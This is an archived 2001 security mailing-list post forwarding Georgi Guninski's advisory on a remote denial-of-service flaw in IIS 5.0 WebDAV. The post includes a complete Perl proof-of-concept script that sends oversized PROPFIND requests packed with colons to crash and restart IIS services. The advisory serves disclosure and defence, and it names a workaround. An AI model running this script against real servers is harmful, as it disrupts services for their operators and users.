OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Mark Curphey (markCURPHEY.COM)
Date: Sun May 06 2001 - 23:23:01 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    FYI

    -----Original Message-----
    From: owner-securityguninski.com [mailto:owner-securityguninski.com]On
    Behalf Of Georgi Guninski
    Sent: Sunday, May 06, 2001 5:27 AM
    To: securityguninski.com
    Subject: IIS 5.0 PROPFIND DOS #2

    Georgi Guninski security advisory #44, 2001

    IIS 5.0 PROPFIND DOS #2

    Systems affected:
    IIS 5.0

    Risk: Medium
    Date: 6 May 2001

    Legal Notice:
    This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it
    unmodified.
    You may not modify it and distribute it or distribute parts of it without
    the author's
    written permission.

    Disclaimer:
    The opinions expressed in this advisory and program are my own and not of
    any company.
    The usual standard disclaimer applies, especially the fact that Georgi
    Guninski
    is not liable for any damages caused by direct or indirect use of the
    information
    or functionality provided by this advisory or program.
    Georgi Guninski bears no responsibility for content or misuse of this
    advisory or program
    or any derivatives thereof.

    Description:

    It is possible to remotely restart all IIS related services using specially
    crafted
    requests.
    If this requests are repeated this seriously affects IIS performance.

    Details:

    Basically the problem are very long but valid propfind request containing
    lots of ":".

    Demonstration:

    --vv9.pl-------------------------------------------------------------------
    #!/usr/bin/perl
    use IO::Socket;
    printf "Written by Georgi Guninski wait some time\n";
    $port = ARGV[1];
    $host = ARGV[0];

    sub vv()
    {
    $ll=$_[0];
    $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto =>
    "TCP") ||
    return;
    $over=":" x $ll ; # the ":" is the most important
    $ch=pack("C",65); # just to check whether potentail payload is possible -
    yes
    $tmp = $ch x 64;
    $over= $ch x 4 . $over . $tmp;
    $over1=":" x $ll; #not sure about this

    $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:"
    xmlns:u="'."$over1".':">';
    $xml=$xml.'<a:prop><a:displayname />'."<u:$over
    />".'</a:prop></a:propfind>'."\n\n";
    $l=length($xml);
    $req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost:
    $host\nContent-length:
    $l\n\n$xml\n\n";
    syswrite($socket,$req,length($req));
    print ".";
    $socket->read($res,200);
    print $res;
    close $socket;
    }

    do vv(59060);
    #this is overflow, repeat several times - 49060 seems the smallest #, may
    need to change
    sleep(1);
    do vv(59060);

    ---------------------------------------------------------------------------

    Workaround: Disabling WebDav extensions may help
    though I do not recommend using IIS on the Internet.

    Vendor status:
    Microsoft was informed on 1 May 2001

    Regards,
    Georgi Guninski
    http://www.guninski.com
    ----------------------
    You may visit Guninski Security Mailing List page at
    http://www.guninski.com/mailinglist.html
    ----------------------